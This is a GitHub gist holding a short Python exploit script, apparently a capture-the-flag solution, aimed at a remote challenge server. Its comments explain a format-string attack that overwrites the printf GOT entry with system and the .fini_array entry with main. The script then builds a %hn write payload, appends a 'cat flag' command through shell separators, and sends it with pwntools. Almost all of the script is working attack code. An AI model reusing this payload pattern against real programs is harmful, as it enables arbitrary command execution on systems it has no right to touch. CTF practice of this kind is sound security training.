Created
September 5, 2016 11:15
-
-
Save CreateRemoteThread/e10ab060f07434ebcc52015a04e01f57 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# vulnerable overwrite is at | |
# overwrite is at .fini_array | |
# 0x08049934 & 36 (half-write each) | |
# main location is 0x080485ED | |
# printf got is 0x08049a38 | |
# system got is 0x08049a48 | |
# system@PLT = 0x8048496 | |
# the vulnerability is twofold: | |
# 1. overwrite printf with system | |
# 2. overwrite .fini_array[0] wth main | |
# 3. pass 'ls' to system | |
# win... | |
# | 12 || 13 || 14 || 15 | | |
out = " \x3a\x9a\x04\x08\x38\x9a\x04\x08\x36\x99\x04\x08\x34\x99\x04\x08" | |
# out += "%12$hn" | |
# out += "%14$hn" | |
out += "%2016x" # pad %n value to 0804 | |
out += "%12$hn" # write 0x804 to printf@PLT | |
out += "%14$hn" # write 0x804 to fini_array | |
out += "%31890x" # pad %n value to 8496 | |
out += "%13$hn" # write the rest of printf@PLT | |
out += "%343x" # pad %n value to 85ED | |
out += "%15$hn" | |
out += "\nhello || cat flag || (" | |
import pwn | |
p = pwn.remote("pwn2.chal.ctf.westerns.tokyo",16317) | |
print p.recv() | |
p.sendline(out) | |
p.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment